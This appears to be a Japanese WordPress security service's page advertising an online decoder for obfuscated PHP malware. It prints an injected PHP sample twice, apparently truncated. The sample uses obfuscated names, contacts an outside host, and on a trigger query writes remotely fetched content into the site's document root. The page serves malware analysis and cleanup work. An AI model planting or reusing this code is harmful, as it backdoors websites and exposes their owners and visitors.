Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php $O = 'MNOst.uvw<xyTe7C12Rjk4+Hlmn/op-qrDY*KU=diP89aW GLVbc:fg|0Az3J_SBQEFhX?>ZI56'; $id = "zu32"; $oOoOoO = "http://zu32.rosejump.com"; $oOOoOoOo = "http://zu32.rosejump.com/jump_engine.php"; $oOOoOooO = "http://zu32.rosejump.com/map_engine.php"; $oOOooOOo = "http://zu32.rosejump.com/products_engine.php"; $oOoOOoOo = $_SERVER["REQUEST_URI"]; $oOOooOOoOoOo = $_SERVER["QUERY_STRING"]; $oOOoOooOOoOo = isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https://" : "http://"; $oOoOOooOoO = $_SERVER["SCRIPT_NAME"]; $oOOooOOoOooO = $_SERVER["DOCUMENT_ROOT"]; if ($oOoOOoOo == "/code_check" || $oOOooOOoOoOo == "code_check") { echo $oOoOOooOoO . $O[30] . $O[30] . $O[30] . $O[28] . $O[20] . $O[55] . $O[55] . $id; exit; } if ($oOOooOOoOoOo == $O[8] . $O[29] . $O[61] . $O[3] . $O[4] . $O[11] . $O[24] . $O[13]) { file_put_contents($oOOooOOoOooO . $O[27] . $O[8] . $O[29] . $O[61] . $O[3] . $O[4] . $O[11] . $O[24] . $O[13] . $O[5] . $O[29] . $O[67] . $O[29], OOO($oOoOoO . $O[27] . $O[8] . $O[29] . $O[61] . $O[3] . $O[4] . $O[11] . $O[24] . $O[13] . $O[5] . $O[4] . $O[10] . $O[4])); copy($oOOooOOoOooO . $O[27] . $O[40] . $O[26] . $O[39] . $O[13] . $O[10] . $O[5] . $O[29] . $O[67] . $O[29], $oOOooOOoOooO . $O[27] . $O[40] . $O[26] . $O[39] . $O[13] . $O[10] . $O[61] . $O[50] . $O[44] . $O[20] . $O[5] . $O[4] . $O[10] . $O[4]); echo $oOOooOOoOoOo . $O[30] . $O[30] . $O[30] . $O[28] . $O[20]; exit; }
<?php $O = 'MNOst.uvw<xyTe7C12Rjk4+Hlmn/op-qrDY*KU=diP89aW GLVbc:fg|0Az3J_SBQEFhX?>ZI56'; $id = "zu32"; $oOoOoO = "http://zu32.rosejump.com"; $oOOoOoOo = "http://zu32.rosejump.com/jump_engine.php"; $oOOoOooO = "http://zu32.rosejump.com/map_engine.php"; $oOOooOOo = "http://zu32.rosejump.com/products_engine.php"; $oOoOOoOo = $_SERVER["REQUEST_URI"]; $oOOooOOoOoOo = $_SERVER["QUERY_STRING"]; $oOOoOooOOoOo = isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https://" : "http://"; $oOoOOooOoO = $_SERVER["SCRIPT_NAME"]; $oOOooOOoOooO = $_SERVER["DOCUMENT_ROOT"]; if ($oOoOOoOo == "/code_check" || $oOOooOOoOoOo == "code_check") { echo $oOoOOooOoO . $O[30] . $O[30] . $O[30] . $O[28] . $O[20] . $O[55] . $O[55] . $id; exit; } if ($oOOooOOoOoOo == $O[8] . $O[29] . $O[61] . $O[3] . $O[4] . $O[11] . $O[24] . $O[13]) { file_put_contents($oOOooOOoOooO . $O[27] . $O[8] . $O[29] . $O[61] . $O[3] . $O[4] . $O[11] . $O[24] . $O[13] . $O[5] . $O[29] . $O[67] . $O[29], OOO($oOoOoO . $O[27] . $O[8] . $O[29] . $O[61] . $O[3] . $O[4] . $O[11] . $O[24] . $O[13] . $O[5] . $O[4] . $O[10] . $O[4])); copy($oOOooOOoOooO . $O[27] . $O[40] . $O[26] . $O[39] . $O[13] . $O[10] . $O[5] . $O[29] . $O[67] . $O[29], $oOOooOOoOooO . $O[27] . $O[40] . $O[26] . $O[39] . $O[13] . $O[10] . $O[61] . $O[50] . $O[44] . $O[20] . $O[5] . $O[4] . $O[10] . $O[4]); echo $oOOooOOoOoOo . $O[30] . $O[30] . $O[30] . $O[28] . $O[20]; exit; }
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.